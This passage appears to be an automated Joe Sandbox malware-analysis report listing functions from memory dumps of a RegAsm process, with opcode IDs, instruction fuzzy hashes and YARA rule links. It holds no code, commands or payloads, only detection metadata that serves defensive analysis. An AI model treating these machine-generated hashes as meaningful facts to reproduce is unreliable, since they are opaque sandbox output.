                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: p<^q
                                                                                                                                                                                  • API String ID: 0-1680888324
                                                                                                                                                                                  • Opcode ID: a2a5c4ddb6a12c4ed49ac2f5e161532d0740f6f79c50a21b7d2b363615899890
                                                                                                                                                                                  • Instruction ID: f569510ff9ba92765b8029e11118ff7cb2b2c69de2df3361e765a98f7c5e47f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: a2a5c4ddb6a12c4ed49ac2f5e161532d0740f6f79c50a21b7d2b363615899890
                                                                                                                                                                                  • Instruction Fuzzy Hash: C03187712402999FCF16EE6AC890AAA3BAAEFCA204F548055FC48C7391CB35DD51DB60
                                                                                                                                                                                  Function 010184B0 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Te^q
                                                                                                                                                                                  • API String ID: 0-671973202
                                                                                                                                                                                  • Opcode ID: 5523353eef42e491243851054888bf12844aa2455208a287e8b5ab4655edbf77
                                                                                                                                                                                  • Instruction ID: 9159dca3a216892e47e17ec98cc363699c68ccc3ed29163d04e49d6eb41285e4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5523353eef42e491243851054888bf12844aa2455208a287e8b5ab4655edbf77
                                                                                                                                                                                  • Instruction Fuzzy Hash: D8212B307142548BDB05DB58DC567DE7BB2EF88300F544166E902AB3C9CF3C5D0687A1
                                                                                                                                                                                  Function 05547C44 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4143513000.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5540000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 4'^q
                                                                                                                                                                                  • API String ID: 0-1614139903
                                                                                                                                                                                  • Opcode ID: 29b40f7234e0b538313d8f9d482893315dd58ae9855e6e1681ccfb4f6508c515
                                                                                                                                                                                  • Instruction ID: 86460654f21c14547c3dff77fb2744ff4db6c19e32bab8d50285155f247ec2a8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 29b40f7234e0b538313d8f9d482893315dd58ae9855e6e1681ccfb4f6508c515
                                                                                                                                                                                  • Instruction Fuzzy Hash: C6110671E193548FCF1A8B60A8152F9FBB2FF44315F0508AAD906A7281D7759845CF81
                                                                                                                                                                                  Function 010184E0 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Te^q
                                                                                                                                                                                  • API String ID: 0-671973202
                                                                                                                                                                                  • Opcode ID: d87261181217295fc5505956ac51702f36bfc1a35ede24b0c07036926dca9f45
                                                                                                                                                                                  • Instruction ID: 0d1fd8c8f40fed5bfa040178ecfbb31219ce26920adf313e38890ba39ff19627
                                                                                                                                                                                  • Opcode Fuzzy Hash: d87261181217295fc5505956ac51702f36bfc1a35ede24b0c07036926dca9f45
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B118A307102149BDB19EB59D85979F7AB2EFC8711F508569E502AB3C8CF794D018BD1
                                                                                                                                                                                  Function 0101DEED Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ]q
                                                                                                                                                                                  • API String ID: 0-3425105455
                                                                                                                                                                                  • Opcode ID: 60437329732f191902aeb57b7068afe0ceecd22f11030aa3d15e8385900590b2
                                                                                                                                                                                  • Instruction ID: 157249da5b813cfef8d7be7e66d56220295fe50237a23a01784abc985bb706c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 60437329732f191902aeb57b7068afe0ceecd22f11030aa3d15e8385900590b2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4801D63120D2D04FC31B9768AC256E53F758FD721070985E7D485CB296C9388C0AC761
                                                                                                                                                                                  Function 0532E540 Relevance: .4, Instructions: 357COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9f66225c0528abdb0458eeebb58094d0783c3b989e6ab8d5142a8aceada6b8eb
                                                                                                                                                                                  • Instruction ID: f8d1e610f90a51d5e9f95b8b7ee8a47e83005920b7bff130dd5e3a83bee7181a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f66225c0528abdb0458eeebb58094d0783c3b989e6ab8d5142a8aceada6b8eb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 07E15F30B106249FCB19FF65D9959AE77B6FF98300F508628E906A7398DF349D06DB80
                                                                                                                                                                                  Function 02CBCB80 Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 73d6883b44bad33018aa81898bdceab99dc9aa9483aaaf8a4f38bb1f365d25f5
                                                                                                                                                                                  • Instruction ID: 66851116ba9fb30b7dd966cdda6eb32a4971ab6cb0edff42889360673aa16c08
                                                                                                                                                                                  • Opcode Fuzzy Hash: 73d6883b44bad33018aa81898bdceab99dc9aa9483aaaf8a4f38bb1f365d25f5
                                                                                                                                                                                  • Instruction Fuzzy Hash: AEA19274B40114CFCB16EF69D884A9E77B6EFC8310F548665E8069B398CB34EE42CB90
                                                                                                                                                                                  Function 053368F0 Relevance: .2, Instructions: 240COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0a46b5b917d7d03106f15643d7302bb5a738457e5b644e2fe852691a9441bf34
                                                                                                                                                                                  • Instruction ID: 8c2dc404dd5d76cd144d257d5920c2590b68d4800e794c597aee72ac94ad70c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a46b5b917d7d03106f15643d7302bb5a738457e5b644e2fe852691a9441bf34
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4918F30B10524AFCB29FB66D9556AEB7B7BF98300F108229D802673D8DF749D46DB81
                                                                                                                                                                                  Function 02CBB228 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e7c68a191a99faf87c69f24bacafa8f7963e37761c01081409a077e614536af1
                                                                                                                                                                                  • Instruction ID: 662995a00c8ba8c9c18db8f6357fd977c24b808ed2bf473f147ddb7a26ace246
                                                                                                                                                                                  • Opcode Fuzzy Hash: e7c68a191a99faf87c69f24bacafa8f7963e37761c01081409a077e614536af1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8971D6717540509BCB49FFAADC946AF36A6EFD4308F508669EA07CB389CD348D09CB91
                                                                                                                                                                                  Function 053368E0 Relevance: .2, Instructions: 203COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d27cefe67dd1652ffb09c6970df9b0f98ca3f2fb6df51e8675bf5f3cb91b73d0
                                                                                                                                                                                  • Instruction ID: c32653b86cd6a1b31d7864111acaaf8829333fba7edea86ceea834e8f9965c25
                                                                                                                                                                                  • Opcode Fuzzy Hash: d27cefe67dd1652ffb09c6970df9b0f98ca3f2fb6df51e8675bf5f3cb91b73d0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D71A230B10524AFCB19FB66D9555AEB7B7BFD8300F108219D84267398DF749D46CB81
                                                                                                                                                                                  Function 0101D490 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 40437cd4f8e2827f1d5c28f071e2be099daab7bbd7e3ffb5935a208602a4cfb1
                                                                                                                                                                                  • Instruction ID: a7375ac0796e1ba0ad69d884ec0403a40bdda77dc47362fa3dc5e1dd5a22898c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 40437cd4f8e2827f1d5c28f071e2be099daab7bbd7e3ffb5935a208602a4cfb1
                                                                                                                                                                                  • Instruction Fuzzy Hash: AE51D370B40215DFDB24EFAADC54B5F77B6EB88314F008628EA069738CCE789D058B91
                                                                                                                                                                                  Function 0533A5A0 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 79ef2d0fb6b98310f946818da02ef029eb77c167b03597d958c1406563ee4243
                                                                                                                                                                                  • Instruction ID: 2bc6dc20cf9eb74b50f83c9f4cef7365b68ade1800049fb8a68d104e2566014d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79ef2d0fb6b98310f946818da02ef029eb77c167b03597d958c1406563ee4243
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F512C36710624AFCB06AFA4D844CAD7BB3FF9D3107068295E6055B235DB31D662EB81
                                                                                                                                                                                  Function 0532A7E8 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 312c2432484e0ae101af27440358ee42a3830fb154056dd21d5f156bd6267158
                                                                                                                                                                                  • Instruction ID: 83bf40957e373cbeaac55f3e473453ff4fdb5174e06faf1140d7c8e8767c1133
                                                                                                                                                                                  • Opcode Fuzzy Hash: 312c2432484e0ae101af27440358ee42a3830fb154056dd21d5f156bd6267158
                                                                                                                                                                                  • Instruction Fuzzy Hash: 58318132710128AFCB05EF65E8449AE7BB7FF88350F018164EA069B395DA71ED12DBC0
                                                                                                                                                                                  Function 0101AE62 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4c59e8b52a2314e6e5af1784ff256faad99eff9da869bf0ee0e2435b505462a6
                                                                                                                                                                                  • Instruction ID: 9fe46243f021ec900621ece96ba3ae65de28f273a25b0feef28a76f5e8e9a3f0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c59e8b52a2314e6e5af1784ff256faad99eff9da869bf0ee0e2435b505462a6
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB41CF71200745CFC721EF69D88475ABBF2EF84320F008A2DE496476E9DB74A849CB90
                                                                                                                                                                                  Function 0533A590 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2c77bbe29b94d2f3daf921ce826fb56dc81c2f95a6d10c531b348536132ff7a4
                                                                                                                                                                                  • Instruction ID: 029fa9cd06e9340202d8b9783c37f21741bab304e1697e3d455f842032fcacb6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c77bbe29b94d2f3daf921ce826fb56dc81c2f95a6d10c531b348536132ff7a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2541C135B106289FCB06FFA8D844DAE7BB3FF59310B018259E505AB235DB31D662DB81
                                                                                                                                                                                  Function 01019338 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9c5e6625c1a495943f9409de7c416079d0bbbcdc594b3163421bf50822de86a4
                                                                                                                                                                                  • Instruction ID: 2f6cc7b2bbf494d034dc3e5375ce27da12925251bc4c602d8534cd374e790282
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c5e6625c1a495943f9409de7c416079d0bbbcdc594b3163421bf50822de86a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: FD31C6716202149FC704FB69E885B9FB7B6EF88350F804128E506D7789DE789E05CBD1
                                                                                                                                                                                  Function 0101C5A7 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d05fdc1c0ad254c1f1981d3ebbe7cd109124292201f341295606c8c5fae69cb4
                                                                                                                                                                                  • Instruction ID: 6c2a094dcc55550be54ae5f718daaf7c7871a9cc5a5cbeb68f0ee8d5047a8baf
                                                                                                                                                                                  • Opcode Fuzzy Hash: d05fdc1c0ad254c1f1981d3ebbe7cd109124292201f341295606c8c5fae69cb4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 49314B70B442009FD7119B698C917AE3BE6EB88310F04856AE906C7385DBB8DD068BA0
                                                                                                                                                                                  Function 05334248 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 07c6febc9637acec52b9c04ac8c77b3c31b7281bd161b4d494e8931ea7f6753c
                                                                                                                                                                                  • Instruction ID: 7f961fd7c2923e47903303d5b419a051925109eacf3df6c1ebd213afc6fc2434
                                                                                                                                                                                  • Opcode Fuzzy Hash: 07c6febc9637acec52b9c04ac8c77b3c31b7281bd161b4d494e8931ea7f6753c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 78314B72A04059AF8F028ED59C10CFFBFBEEF4D210F044166FA55E2151D636DA25ABB0
                                                                                                                                                                                  Function 0101A450 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: c896ea55a2dcf6621abff95e09afba749393b970fdb063cfe661846c08dddcc7
                                                                                                                                                                                  • Instruction ID: 47ed8dfb4a2e21026ac0651e6e4fa8a8572ca7350ef07fae90d39ed940299e45
                                                                                                                                                                                  • Opcode Fuzzy Hash: c896ea55a2dcf6621abff95e09afba749393b970fdb063cfe661846c08dddcc7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3731C171620158DFCB09EF99D85599F7BB6EFC8320F108155F916A7388CE749D018F90
                                                                                                                                                                                  Function 0101A460 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a06dd76c5448b9506ecd4cd9d8d949940eb539583f346184fef51ffa5a08c713
                                                                                                                                                                                  • Instruction ID: e53ad023559e4a4199e6cb709a222c67a6e98372ddeb13a9692056810ba55b68
                                                                                                                                                                                  • Opcode Fuzzy Hash: a06dd76c5448b9506ecd4cd9d8d949940eb539583f346184fef51ffa5a08c713
                                                                                                                                                                                  • Instruction Fuzzy Hash: 833171716201589BDB18EE99D85499F7BB6EFC8320F108155F616A7388CE749D018F90
                                                                                                                                                                                  Function 0532A7D8 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7048b1188fd1ce1613a7b2d8ed4432da1b79cf4359ec69293375bf41c0ac0174
                                                                                                                                                                                  • Instruction ID: 66016edcee35720df63d3a5eaf44c8abec721bba9bb8f395d9088e1b5043cd6a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7048b1188fd1ce1613a7b2d8ed4432da1b79cf4359ec69293375bf41c0ac0174
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A21A136610114AFCB05DF95EC44E9A7BB7FF88310F054068FA069B3A5DA71DD15DB80
                                                                                                                                                                                  Function 0101C5C8 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d3d4acc746de0977bd07780a03e65f7b2d05a304399dcb1aa34a0ca805d90fa6
                                                                                                                                                                                  • Instruction ID: 3c824ced2293e6e11a556b9f66a1e86bbf689b9b7c81614ad91289e46025175c
                                                                                                                                                                                  • Opcode Fuzzy Hash: d3d4acc746de0977bd07780a03e65f7b2d05a304399dcb1aa34a0ca805d90fa6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7221E734B502049FDB15EF69CC407AF36E6EB88710F148569EA0AC7388DAB4DD068BA0
                                                                                                                                                                                  Function 05326120 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: dd96b84c4c34552dcec276c12cc353c96ac8786bf8031c348f2c69a6b161a98c
                                                                                                                                                                                  • Instruction ID: c43ae1e532ad400987efc459cc74fc1b2c98f9683378ad714434be45704941d9
                                                                                                                                                                                  • Opcode Fuzzy Hash: dd96b84c4c34552dcec276c12cc353c96ac8786bf8031c348f2c69a6b161a98c
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC01DB37900525AFCF05DF94D805CD9BB76FF89320B068461EA057B226C672E929DB90
                                                                                                                                                                                  Function 0101BD18 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 32b295cd43262e4eda5e607bcaaed5eb7237a7bfd28c9fe498adb3e70cbfb0d1
                                                                                                                                                                                  • Instruction ID: f6be280310e624df25dbf2817aa1ab4dbb1766ca21a1c24787e36949c282b3bd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 32b295cd43262e4eda5e607bcaaed5eb7237a7bfd28c9fe498adb3e70cbfb0d1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 30216030A01209DFDB14EFA9E894A9EBBB1FF88310F108129E511A7398DB749D02CF80
                                                                                                                                                                                  Function 0101BDFE Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0d6c334a918db49fef9d4f2473c18ed1c8662dc304c4bab1a111181430c8b00b
                                                                                                                                                                                  • Instruction ID: aa8bb3c87a26ad6960eaf29eb1ac9415c86c27461d3307ee151f67b5b2fa0f06
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d6c334a918db49fef9d4f2473c18ed1c8662dc304c4bab1a111181430c8b00b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C31C875A516199FDB04DF99E894AAE7BF2FF98310F144158F902AB358CB34AD41CF80
                                                                                                                                                                                  Function 02CBCB70 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 09a258bd4e1484992b506b25ed3a5683aa40da661624df4decfef99cd0cf92b9
                                                                                                                                                                                  • Instruction ID: f9fccae2d050bbc1b4a9c689124b064bc4f3aaf2f2b9902b454463f4a0e2c5d4
